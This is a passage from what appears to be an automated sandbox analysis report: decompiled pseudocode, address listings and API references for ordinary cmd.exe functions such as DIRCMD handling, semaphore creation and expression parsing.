								_push(_v56 + _v56);
								_push(_v80);
								if(_v76 != 0) {
									goto L103;
								}
								_t163 = memcpy(_t255, ??, ??);
								_t279 = _t282 + 0xc;
								_t255 = _t255 + _v56 * 2;
								_v84 = _t255;
								_v88 = _t270;
							}
							_t163 =  *_t272 & 0x0000ffff;
							 *_t255 = _t163;
							_t255 = _t255 + 2;
							_v84 = _t255;
							_t272 =  &(_t272[1]);
							_v88 = _t272;
							if(_t163 != 0) {
								goto L42;
							}
							_t255 = _v44;
							goto L45;
						}
					}
					L22:
					 *_a4 = _v32 - _t175 >> 1;
					_t262 = _t255;
					_v36 = _t262;
					_t252 = _v40;
					goto L23;
				}
				_t226 = __edx;
				_v32 = __edx;
				_t273 = __edx;
				_t229 =  *0x1213cc9;
				while(1) {
					_t165 =  *_t226 & 0x0000ffff;
					if(_t165 == 0) {
						break;
					}
					_t181 = _a8;
					if(_t165 == _t181 || _t229 != 0 && _t165 == 0x3a && _t226[1] != _t181) {
						break;
					} else {
						_t13 =  &(_t273[1]); // 0x2
						_t226 = _t13;
						_v32 = _t226;
						_t273 = _t226;
						continue;
					}
				}
				if( *_t226 == 0) {
					goto L73;
				}
				_t175 = _v52;
				if(_t273 == _t175) {
					goto L73;
				}
				_t276 = (_t273 - _t175 >> 1) + 1;
				_t252 = E011E00B0(_t276 + _t276);
				_v40 = _t252;
				if(_t252 == 0) {
					goto L91;
				}
				_t19 = _t276 - 1; // 0x0
				_t167 = _t19;
				if(_t276 == 0) {
					goto L21;
				}
				if(_t276 > 0x7fffffff) {
					if(_t276 == 0) {
						goto L21;
					}
					L95:
					 *_t252 = 0;
					goto L21;
				}
				if(_t167 > 0x7ffffffe) {
					goto L95;
				}
				_t228 = _t175;
				_t229 = _t252;
				_t173 = 0;
				while(1) {
					_v68 = _t173;
					_v64 = _t229;
					_v96 = _t276;
					_v92 = _t228;
					_v100 = _t167;
					if(_t276 == 0) {
						goto L93;
					}
					if(_t167 == 0) {
						L19:
						if(_t276 == 0) {
							goto L93;
						}
						goto L20;
					}
					_t260 =  *_t228 & 0x0000ffff;
					if(_t260 == 0) {
						goto L19;
					}
					 *_t229 = _t260;
					_t229 =  &(_t229[0]);
					_t228 =  &(_t228[1]);
					_t276 = _t276 - 1;
					_t167 = _t167 - 1;
					_t173 = _t173 + 1;
				}
				goto L93;
			}










































































































                                    0x011d8f70
                                    0x011d8f75
                                    0x011d8f77
                                    0x011d8f7c
                                    0x011d8f87
                                    0x011d8f88
                                    0x011d8f8e
                                    0x011d8f93
                                    0x011d8f98
                                    0x011d8f9c
                                    0x011d8fa4
                                    0x011d8fa7
                                    0x011d8faa
                                    0x011d8fb1
                                    0x011d8fb3
                                    0x011d8fb6
                                    0x011d8fb8
                                    0x011d8fbb
                                    0x011d8fc3
                                    0x011d8fc8
                                    0x011d8fcd
                                    0x011f08a4
                                    0x011f08a9
                                    0x011d9369
                                    0x011d9369
                                    0x011d936c
                                    0x011d936c
                                    0x011d90d3
                                    0x011d90d3
                                    0x011d90da
                                    0x011d90e4
                                    0x011d90f2
                                    0x011d90f2
                                    0x011f08b2
                                    0x011f08b8
                                    0x011f08b8
                                    0x011f08bd
                                    0x011d9366
                                    0x011d9366
                                    0x00000000
                                    0x011d9366
                                    0x011f08c6
                                    0x011f08cc
                                    0x011f08cc
                                    0x011f08cf
                                    0x011f08d3
                                    0x011d9096
                                    0x011d9098
                                    0x011d909b
                                    0x011d909e
                                    0x011d90a1
                                    0x011d90a1
                                    0x011d90aa
                                    0x011d90b4
                                    0x011d90b6
                                    0x011d90bd
                                    0x011d90fc
                                    0x00000000
                                    0x011d9102
                                    0x011d9102
                                    0x011d9105
                                    0x011d910b
                                    0x011d91ef
                                    0x011d91f2
                                    0x011d9205
                                    0x011d9207
                                    0x011d920a
                                    0x011d920f
                                    0x011d922a
                                    0x011d922a
                                    0x011d922c
                                    0x011d922c
                                    0x011d9230
                                    0x011d9230
                                    0x011d9233
                                    0x011d9236
                                    0x011d9241
                                    0x011d93b6
                                    0x011d93b8
                                    0x011d93b8
                                    0x011d93c0
                                    0x011d93c0
                                    0x011d93c3
                                    0x011d93c6
                                    0x011d93cd
                                    0x011d9249
                                    0x011d924b
                                    0x011f08ed
                                    0x011d926d
                                    0x011d926d
                                    0x011d9270
                                    0x011d9277
                                    0x011d9377
                                    0x011d937a
                                    0x011d937c
                                    0x011d937c
                                    0x011d9380
                                    0x011d9380
                                    0x011d9383
                                    0x011d9386
                                    0x011d935d
                                    0x011d935f
                                    0x011d92c7
                                    0x011d92c7
                                    0x011d92ca
                                    0x011d92cc
                                    0x011d92cc
                                    0x011d92d0
                                    0x011d92d0
                                    0x011d92d3
                                    0x011d92d6
                                    0x011d92e2
                                    0x011d92e7
                                    0x011d92f1
                                    0x011f08f6
                                    0x011f08f6
                                    0x011d92f7
                                    0x011d92fd
                                    0x011d9300
                                    0x011d9303
                                    0x011d930a
                                    0x011f08ff
                                    0x011f08ff
                                    0x011f0902
                                    0x00000000
                                    0x011d9310
                                    0x011d9315
                                    0x011d91e2
                                    0x011d91e2
                                    0x011d91e4
                                    0x011d91e7
                                    0x00000000
                                    0x011d91e7
                                    0x011d930a
                                    0x011d927d
                                    0x011d9280
                                    0x011d9293
                                    0x011d9295
                                    0x011d929a
                                    0x011d938d
                                    0x011d9390
                                    0x011d9393
                                    0x011d9393
                                    0x011d9396
                                    0x011d9399
                                    0x011d93a2
                                    0x011d93a4
                                    0x011d93a9
                                    0x011d93af
                                    0x011d93af
                                    0x011d93a9
                                    0x011d92a0
                                    0x011d92a3
                                    0x011d92a6
                                    0x011d92a8
                                    0x011d92a8
                                    0x011d92b0
                                    0x011d92b0
                                    0x011d92b3
                                    0x011d92b6
                                    0x011d92c1
                                    0x011d934d
                                    0x011d934f
                                    0x011d934f
                                    0x011d9352
                                    0x011d9352
                                    0x011d9355
                                    0x011d9358
                                    0x00000000
                                    0x011d9352
                                    0x00000000
                                    0x011d92c1
                                    0x011d9251
                                    0x011d9253
                                    0x011d9253
                                    0x011d9256
                                    0x011d9256
                                    0x011d9259
                                    0x011d925c
                                    0x011d9267
                                    0x011d93d4
                                    0x011d93d6
                                    0x011d93d6
                                    0x011d93e0
                                    0x011d93e0
                                    0x011d93e3
                                    0x011d93e6
                                    0x011d93ed
                                    0x011d93ed
                                    0x00000000
                                    0x011d9267
                                    0x011d9247
                                    0x00000000
                                    0x011d9247
                                    0x011d9211
                                    0x011d9213
                                    0x011d9213
                                    0x011d9216
                                    0x011d9216
                                    0x011d9219
                                    0x011d921c
                                    0x011d9225
                                    0x011d9227
                                    0x00000000
                                    0x011d9227
                                    0x011d9114
                                    0x011f090a
                                    0x011f090d
                                    0x011f0910
                                    0x011d911a
                                    0x011d911a
                                    0x011d911a
                                    0x011d9121
                                    0x011d9123
                                    0x011d9126
                                    0x011d9128
                                    0x011d9128
                                    0x011d912e
                                    0x00000000
                                    0x00000000
                                    0x011d9135
                                    0x011d9138
                                    0x011d913b
                                    0x011d913b
                                    0x011d9143
                                    0x011f091c
                                    0x011f091c
                                    0x00000000
                                    0x011f091c
                                    0x011d914b
                                    0x011d914d
                                    0x011d914f
                                    0x011f0924
                                    0x011f0929
                                    0x00000000
                                    0x00000000
                                    0x011f0933
                                    0x011f0938
                                    0x011f093e
                                    0x011f0944
                                    0x011f0944
                                    0x011f0948
                                    0x011f0960
                                    0x00000000
                                    0x011f0960
                                    0x011d9155
                                    0x011d9158
                                    0x011d915a
                                    0x011d915d
                                    0x011d915d
                                    0x011d915f
                                    0x011d9162
                                    0x011d9168
                                    0x00000000
                                    0x00000000
                                    0x011d9170
                                    0x011d9170
                                    0x011d9179
                                    0x011d917c
                                    0x00000000
                                    0x00000000
                                    0x011d9182
                                    0x011d9185
                                    0x011d918c
                                    0x011d9194
                                    0x011d919a
                                    0x00000000
                                    0x00000000
                                    0x011d91a2
                                    0x011d91a7
                                    0x011d91ac
                                    0x011d91af
                                    0x011d91b2
                                    0x011d91b2
                                    0x011d91b7
                                    0x011d91bd
                                    0x011d91c2
                                    0x00000000
                                    0x00000000
                                    0x011d9322
                                    0x011d9325
                                    0x011d9326
                                    0x011d932d
                                    0x00000000
                                    0x00000000
                                    0x011d9334
                                    0x011d9339
                                    0x011d933f
                                    0x011d9342
                                    0x011d9345
                                    0x011d9345
                                    0x011d91c8
                                    0x011d91cb
                                    0x011d91ce
                                    0x011d91d1
                                    0x011d91d4
                                    0x011d91d7
                                    0x011d91dd
                                    0x00000000
                                    0x00000000
                                    0x011d91df
                                    0x00000000
                                    0x011d91df
                                    0x011d90fc
                                    0x011d90bf
                                    0x011d90c9
                                    0x011d90cb
                                    0x011d90cd
                                    0x011d90d0
                                    0x00000000
                                    0x011d90d0
                                    0x011d8fd3
                                    0x011d8fd5
                                    0x011d8fd8
                                    0x011d8fda
                                    0x011d8fe0
                                    0x011d8fe0
                                    0x011d8fe6
                                    0x00000000
                                    0x00000000
                                    0x011d8fe8
                                    0x011d8fef
                                    0x00000000
                                    0x011d8ffa
                                    0x011d8ffa
                                    0x011d8ffa
                                    0x011d8ffd
                                    0x011d9000
                                    0x00000000
                                    0x011d9000
                                    0x011d8fef
                                    0x011d900e
                                    0x00000000
                                    0x00000000
                                    0x011d9014
                                    0x011d9019
                                    0x00000000
                                    0x00000000
                                    0x011d9023
                                    0x011d902c
                                    0x011d902e
                                    0x011d9033
                                    0x00000000
                                    0x00000000
                                    0x011d9039
                                    0x011d9039
                                    0x011d903e
                                    0x00000000
                                    0x00000000
                                    0x011d9046
                                    0x011f08dd
                                    0x00000000
                                    0x00000000
                                    0x011f08e3
                                    0x011f08e5
                                    0x00000000
                                    0x011f08e5
                                    0x011d9051
                                    0x00000000
                                    0x00000000
                                    0x011d9057
                                    0x011d9059
                                    0x011d905b
                                    0x011d905d
                                    0x011d905d
                                    0x011d9060
                                    0x011d9063
                                    0x011d9066
                                    0x011d9069
                                    0x011d906e
                                    0x00000000
                                    0x00000000
                                    0x011d9076
                                    0x011d908e
                                    0x011d9090
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011d9090
                                    0x011d9078
                                    0x011d907e
                                    0x00000000
                                    0x00000000
                                    0x011d9080
                                    0x011d9083
                                    0x011d9086
                                    0x011d9089
                                    0x011d908a
                                    0x011d908b
                                    0x011d908b
                                    0x00000000

                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • _wcsnicmp.MSVCRT ref: 011D91B7
                                    • wcstol.MSVCRT ref: 011D91FC
                                    • wcstol.MSVCRT ref: 011D928A
                                    • longjmp.MSVCRT(?,000000FF,2833377E,-00000002,?,00000000), ref: 011F08B2
                                    • longjmp.MSVCRT(?,000000FF), ref: 011F08C6
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heaplongjmpwcstol$AllocProcess_wcsnicmp
                                    • String ID:
                                    • API String ID: 2863075230-0
                                    • Opcode ID: c397067abf6fb0c4aa5724a5f3c1078fa363aac5d361b6401951d517de5f7674
                                    • Instruction ID: 8a321189e41723879131518aa523104b78af93cb225adccae0a9bc184099677d
                                    • Opcode Fuzzy Hash: c397067abf6fb0c4aa5724a5f3c1078fa363aac5d361b6401951d517de5f7674
                                    • Instruction Fuzzy Hash: 8CF1E175D0020A9BDF2CCFA8C4846FEBBB5BF88708F19421DD916A7384EB715901CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E4F66, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 184COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E011E4F66(intOrPtr __ecx, signed int __edx) {
				signed int _v8;
				long _v20;
				char _v24;
				WCHAR* _v28;
				void _v548;
				int _v556;
				char _v560;
				void* _v564;
				char _v1076;
				void _v1084;
				void* _v1096;
				int _v1100;
				WCHAR* _v1104;
				WCHAR* _v1108;
				char _v1112;
				WCHAR* _v1116;
				int _v1120;
				void* _v1124;
				intOrPtr _v1128;
				void* _v1138;
				int _v1142;
				int _v1146;
				int _v1150;
				int _v1154;
				int _v1158;
				int _v1162;
				int _v1166;
				int _v1170;
				short _v1172;
				int _v1176;
				WCHAR* _v1180;
				int _v1184;
				char _v1188;
				int _v1192;
				int _v1196;
				intOrPtr _v1200;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t78;
				WCHAR* _t97;
				signed int _t101;
				char _t112;
				void* _t113;
				void* _t135;
				void* _t139;
				intOrPtr _t140;
				signed int _t141;
				signed int _t143;
				signed int _t144;

				_t130 = __edx;
				_t143 = (_t141 & 0xfffffff8) - 0x4ac;
				_t78 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t78 ^ _t143;
				_v1200 = __ecx;
				_v1180 = 0;
				_v1172 = 0;
				_v1196 = 0;
				_v1192 = 0;
				_v1188 = 0;
				_t112 = 1;
				_v1184 = 0;
				_v1176 = 0;
				_v1170 = 0;
				_v1166 = 0;
				_v1162 = 0;
				_v1158 = 0;
				_v1154 = 0;
				_v1150 = 0;
				_v1146 = 0;
				_v1142 = 0;
				asm("stosd");
				_v564 = 0;
				asm("stosd");
				_v560 = 1;
				_v556 = 0x104;
				asm("stosd");
				asm("stosw");
				_v1124 = 0;
				_v1120 = 0;
				_v1116 = 0;
				_v1112 = 0;
				_v1108 = 0;
				_v1104 = 0;
				_v1100 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				memset( &_v1084, 0, 0x104);
				_t144 = _t143 + 0xc;
				if(E011E0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L14:
					__imp__??_V@YAXPAX@Z(_v564);
					_pop(_t135);
					_pop(_t139);
					_pop(_t113);
					return E011E6FD0(_t112, _t113, _v8 ^ _t144, _t130, _t135, _t139);
				}
				_t140 =  *0x1213cd8;
				_v1192 = 6;
				_v20 = 0x104;
				_v1188 = 0;
				_v1196 = 0x8000;
				_v1124 = 0;
				_v1104 = 0;
				_v28 = 0;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				_t144 = _t144 + 0xc;
				if(E011E0C70( &_v548, GetEnvironmentVariableW(L"DIRCMD", 0, 0)) < 0) {
					L13:
					__imp__??_V@YAXPAX@Z(_v28);
					goto L14;
				}
				_t97 = _v28;
				if(_t97 == 0) {
					_t97 =  &_v548;
				}
				if(GetEnvironmentVariableW(L"DIRCMD", _t97, _v20) != 0) {
					_t122 = _v28;
					if(_v28 == 0) {
						_t122 =  &_v548;
					}
					if(E011DCB48( &_v1196) == _t112) {
						_push(0);
						_push(0x2377);
						E011DC5A2(_t122);
					}
				}
				_t130 =  &_v1196;
				if(E011DCB48( &_v1196) != _t112) {
					_t101 = _v1196;
					if((_t101 & 0x00000040) != 0) {
						_t101 = _t101 & 0xfffb79fb;
						_v1196 = _t101;
					}
					if((_t101 & 0x00000400) != 0) {
						_v1196 = _t101 & 0xfffffdbb;
					}
					_t124 = _v564;
					if(_v564 == 0) {
						_t124 =  &_v1084;
					}
					_t130 = _v556;
					E011E36CB(_t112, _t124, _v556, 0);
					if(_v1128 == 0) {
						_t125 = _v564;
						_v1124 = _t112;
						if(_v564 == 0) {
							_t125 =  &_v1084;
						}
						_v1120 = E011E297B(_t125);
						_v1112 = _t112;
						_v1116 = 0;
						_v1108 = 0;
					}
					_t112 = E011E2DD2( &_v1188, _t130);
					_t106 = _v556;
					if(_v556 == 0) {
						_t106 =  &_v1076;
					}
					E011E0BFC(_t106, _v548);
					E011E2A06(_t140, 0);
				}
				goto L13;
			}






















































                                    0x011e4f66
                                    0x011e4f6e
                                    0x011e4f74
                                    0x011e4f7b
                                    0x011e4f85
                                    0x011e4f8b
                                    0x011e4f8f
                                    0x011e4f98
                                    0x011e4fa0
                                    0x011e4fa9
                                    0x011e4fad
                                    0x011e4fae
                                    0x011e4fb2
                                    0x011e4fb6
                                    0x011e4fba
                                    0x011e4fbe
                                    0x011e4fc2
                                    0x011e4fc6
                                    0x011e4fca
                                    0x011e4fce
                                    0x011e4fd2
                                    0x011e4fd6
                                    0x011e4fd9
                                    0x011e4fe0
                                    0x011e4fe1
                                    0x011e4fe8
                                    0x011e4fef
                                    0x011e4ff0
                                    0x011e4ff4
                                    0x011e4ffc
                                    0x011e5000
                                    0x011e5004
                                    0x011e5008
                                    0x011e500c
                                    0x011e5010
                                    0x011e5014
                                    0x011e5015
                                    0x011e5016
                                    0x011e501f
                                    0x011e502d
                                    0x011e504a
                                    0x011e5176
                                    0x011e517d
                                    0x011e518d
                                    0x011e518e
                                    0x011e518f
                                    0x011e519a
                                    0x011e519a
                                    0x011e5050
                                    0x011e505d
                                    0x011e5066
                                    0x011e5076
                                    0x011e507a
                                    0x011e5082
                                    0x011e5086
                                    0x011e508a
                                    0x011e5091
                                    0x011e5098
                                    0x011e509d
                                    0x011e50bc
                                    0x011e5168
                                    0x011e516f
                                    0x00000000
                                    0x011e5175
                                    0x011e50c2
                                    0x011e50cb
                                    0x011e50cd
                                    0x011e50cd
                                    0x011e50e9
                                    0x011ef084
                                    0x011ef08d
                                    0x011ef08f
                                    0x011ef08f
                                    0x011ef0a1
                                    0x011ef0a7
                                    0x011ef0a8
                                    0x011ef0ad
                                    0x011ef0b3
                                    0x011ef0a1
                                    0x011e50f3
                                    0x011e50fe
                                    0x011e5100
                                    0x011e5106
                                    0x011e5108
                                    0x011e510d
                                    0x011e510d
                                    0x011e5116
                                    0x011ef0be
                                    0x011ef0be
                                    0x011e511c
                                    0x011e5125
                                    0x011e519b
                                    0x011e519b
                                    0x011e5127
                                    0x011e512f
                                    0x011e5138
                                    0x011ef0c7
                                    0x011ef0ce
                                    0x011ef0d4
                                    0x011ef0d6
                                    0x011ef0d6
                                    0x011ef0e2
                                    0x011ef0e6
                                    0x011ef0ea
                                    0x011ef0ee
                                    0x011ef0ee
                                    0x011e5147
                                    0x011e5149
                                    0x011e5152
                                    0x011e51a4
                                    0x011e51a4
                                    0x011e515c
                                    0x011e5163
                                    0x011e5163
                                    0x00000000

                                    APIs
                                    • memset.MSVCRT ref: 011E501F
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • memset.MSVCRT ref: 011E5098
                                    • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,00000000,00000000,?,?,-00000001,?,00000002,00000000), ref: 011E50A7
                                    • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,?,?,00000000,?,?,-00000001,?,00000002,00000000), ref: 011E50E1
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E516F
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E517D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$EnvironmentVariable
                                    • String ID: DIRCMD
                                    • API String ID: 1405722092-1465291664
                                    • Opcode ID: ddbe93d8486c01f50388b051cc44334a3ec5a15c46ba39f6d4d3d4a07d4e66f2
                                    • Instruction ID: 9df05a81d3d1e3ea09cbe4502f8e4b083b1439eed2b9887544558e7936430aac
                                    • Opcode Fuzzy Hash: ddbe93d8486c01f50388b051cc44334a3ec5a15c46ba39f6d4d3d4a07d4e66f2
                                    • Instruction Fuzzy Hash: 7E7139B160CB829FD768CFA9D88869BBBE5BFD4308F04492EF59983250DB309544CB57
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F196F, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 120COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 76%
                                    			E011F196F(void** __ecx, intOrPtr _a4, signed int _a12, signed int _a16) {
				void* _v0;
				signed int _v8;
				char _v532;
				void** _v536;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				short* _t26;
				void* _t29;
				void* _t31;
				signed int* _t38;
				void** _t40;
				long _t41;
				signed int _t42;
				signed int _t47;
				char* _t48;
				void* _t55;
				signed int _t57;
				signed int _t59;
				signed int _t60;
				void* _t61;
				void* _t63;
				void* _t64;
				signed int _t65;

				_t20 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t20 ^ _t65;
				_t59 = _a12;
				_t40 = __ecx;
				_v536 = __ecx;
				_t24 = _t59 & 0x80000000 | _a16;
				if((_t59 & 0x80000000 | _a16) != 0) {
					E011E80F2(_t24);
				}
				E011E1040( &_v532, 0x104, _a4);
				_t57 = 0x104;
				_t26 =  &_v532;
				while( *_t26 != 0) {
					_t26 = _t26 + 2;
					_t57 = _t57 - 1;
					if(_t57 != 0) {
						continue;
					}
					break;
				}
				asm("sbb ecx, ecx");
				_t47 =  ~_t57 & 0x00000104 - _t57;
				if(_t57 != 0) {
					_t38 =  &_v532 + _t47 * 2;
					_t64 = 0x104 - _t47;
					if(_t64 == 0) {
						L14:
						_t38 = _t38 - 2;
					} else {
						_t55 = 0x7ffffffe;
						_t57 = L"_p0" - _t38;
						while(_t55 != 0) {
							_t42 =  *(_t38 + _t57) & 0x0000ffff;
							if(_t42 == 0) {
								break;
							} else {
								 *_t38 = _t42;
								_t55 = _t55 - 1;
								_t38 =  &(_t38[0]);
								_t64 = _t64 - 1;
								if(_t64 != 0) {
									continue;
								} else {
									L13:
									_t40 = _v536;
									goto L14;
								}
							}
							goto L16;
						}
						if(_t64 != 0) {
							_t40 = _v536;
						} else {
							goto L13;
						}
					}
					L16:
					 *_t38 = 0;
				}
				_t60 = _t59 & 0x7fffffff;
				_t29 = _t60;
				if(_t60 <= 0) {
					_t29 = 1;
				}
				_t48 =  &_v532;
				__imp__CreateSemaphoreExW(0, _t60, _t29, _t48, 0, 0x1f0003);
				_t61 = _t29;
				if(_t61 == 0) {
					_t57 = 0x1621;
					_t63 = E011F2913("internal\\sdk\\inc\\wil\\ResultMacros.h");
					if(_t63 >= 0) {
						goto L25;
					} else {
						_t57 = 0x84;
						E011F292C("wil", _t63);
						_t31 = _t63;
					}
				} else {
					_t63 =  *_t40;
					if(_t63 != 0) {
						_t41 = GetLastError();
						if(CloseHandle(_t63) == 0) {
							_push(_t48);
							_t57 = 0x879;
							E011F2D56();
						}
						SetLastError(_t41);
						_t40 = _v536;
					}
					 *_t40 = _t61;
					L25:
					_t31 = 0;
				}
				return E011E6FD0(_t31, _t40, _v8 ^ _t65, _t57, _t61, _t63);
			}




























                                    0x011f197a
                                    0x011f1981
                                    0x011f1987
                                    0x011f198a
                                    0x011f198e
                                    0x011f1999
                                    0x011f199c
                                    0x011f199e
                                    0x011f199e
                                    0x011f19b3
                                    0x011f19b8
                                    0x011f19ba
                                    0x011f19c0
                                    0x011f19c6
                                    0x011f19c9
                                    0x011f19cc
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f19cc
                                    0x011f19d6
                                    0x011f19d8
                                    0x011f19dc
                                    0x011f19e4
                                    0x011f19e7
                                    0x011f19e9
                                    0x011f1a1c
                                    0x011f1a1c
                                    0x011f19eb
                                    0x011f19f0
                                    0x011f19f5
                                    0x011f19f7
                                    0x011f19fb
                                    0x011f1a02
                                    0x00000000
                                    0x011f1a04
                                    0x011f1a04
                                    0x011f1a07
                                    0x011f1a08
                                    0x011f1a0b
                                    0x011f1a0e
                                    0x00000000
                                    0x011f1a10
                                    0x011f1a16
                                    0x011f1a16
                                    0x00000000
                                    0x011f1a16
                                    0x011f1a0e
                                    0x00000000
                                    0x011f1a02
                                    0x011f1a14
                                    0x011f1a21
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f1a14
                                    0x011f1a27
                                    0x011f1a29
                                    0x011f1a29
                                    0x011f1a2c
                                    0x011f1a32
                                    0x011f1a34
                                    0x011f1a36
                                    0x011f1a36
                                    0x011f1a42
                                    0x011f1a4d
                                    0x011f1a53
                                    0x011f1a57
                                    0x011f1aa7
                                    0x011f1ab6
                                    0x011f1aba
                                    0x00000000
                                    0x011f1abc
                                    0x011f1abf
                                    0x011f1aca
                                    0x011f1acf
                                    0x011f1acf
                                    0x011f1a59
                                    0x011f1a59
                                    0x011f1a5d
                                    0x011f1a66
                                    0x011f1a70
                                    0x011f1a72
                                    0x011f1a76
                                    0x011f1a7b
                                    0x011f1a7b
                                    0x011f1a81
                                    0x011f1a87
                                    0x011f1a87
                                    0x011f1a8d
                                    0x011f1a8f
                                    0x011f1a8f
                                    0x011f1a8f
                                    0x011f1aa1

                                    APIs
                                    • CreateSemaphoreExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,?,00000000,001F0003,00000000,?,?,00000000), ref: 011F1A4D
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F1A5F
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000104), ref: 011F1A68
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 011F1A81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ErrorLast$CloseCreateHandleSemaphore
                                    • String ID: _p0$internal\sdk\inc\wil\ResultMacros.h$wil
                                    • API String ID: 2276426104-46676964
                                    • Opcode ID: 2411543d172e2dea0436873dfe260126bab9596f8a58e814398f4319775bf0d9
                                    • Instruction ID: f9ea3adfe148da17dcd83e22b9dbe5fc151c1b47d0200f660f2caf3e00ac0daf
                                    • Opcode Fuzzy Hash: 2411543d172e2dea0436873dfe260126bab9596f8a58e814398f4319775bf0d9
                                    • Instruction Fuzzy Hash: 91412332B4016AEBDB2DDE28C958BAA37E5FF94310F15416CEA05E7284DB70CD04CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D6785, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 73COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E011D6785(signed short** __ecx, signed short** __edx, void* __eflags, signed short** _a4) {
				signed short* _t8;
				signed short _t9;
				long _t13;
				signed short** _t18;
				signed short _t25;
				long _t32;
				wchar_t* _t33;
				signed short** _t34;

				_t18 = __edx;
				_t34 = __ecx;
				E011D9794(__ecx);
				_t32 =  *( *_t34) & 0x0000ffff;
				if(_t32 == 0 || iswdigit(_t32) != 0 || wcschr(L"<>+-*/%()|^&=,", _t32) != 0) {
					L12:
					return 0;
				} else {
					_t33 = L"+-~!";
					if(wcschr(_t33, _t32) != 0) {
						goto L12;
					}
					_t8 =  *_t34;
					 *_t18 = _t8;
					while(1) {
						_t9 =  *_t8 & 0x0000ffff;
						_t25 = _t9;
						if(_t9 == 0) {
							break;
						}
						_t13 = _t25 & 0x0000ffff;
						if(_t13 <= 0x20 || wcschr(_t33, _t13) != 0 || wcschr(L"<>+-*/%()|^&=,",  *( *_t34) & 0x0000ffff) != 0) {
							break;
						} else {
							 *_t34 =  &(( *_t34)[1]);
							_t8 =  *_t34;
							continue;
						}
					}
					 *_a4 =  *_t34;
					return 1;
				}
			}











                                    0x011d678d
                                    0x011d678f
                                    0x011d6791
                                    0x011d6798
                                    0x011d679e
                                    0x011d6828
                                    0x00000000
                                    0x011d67c2
                                    0x011d67c3
                                    0x011d67d3
                                    0x00000000
                                    0x00000000
                                    0x011d67d5
                                    0x011d67d7
                                    0x011d67d9
                                    0x011d67d9
                                    0x011d67dc
                                    0x011d67e1
                                    0x00000000
                                    0x00000000
                                    0x011d67e3
                                    0x011d67e9
                                    0x00000000
                                    0x011d6810
                                    0x011d6810
                                    0x011d6813
                                    0x00000000
                                    0x011d6813
                                    0x011d67e9
                                    0x011d681c
                                    0x00000000
                                    0x011d6820

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
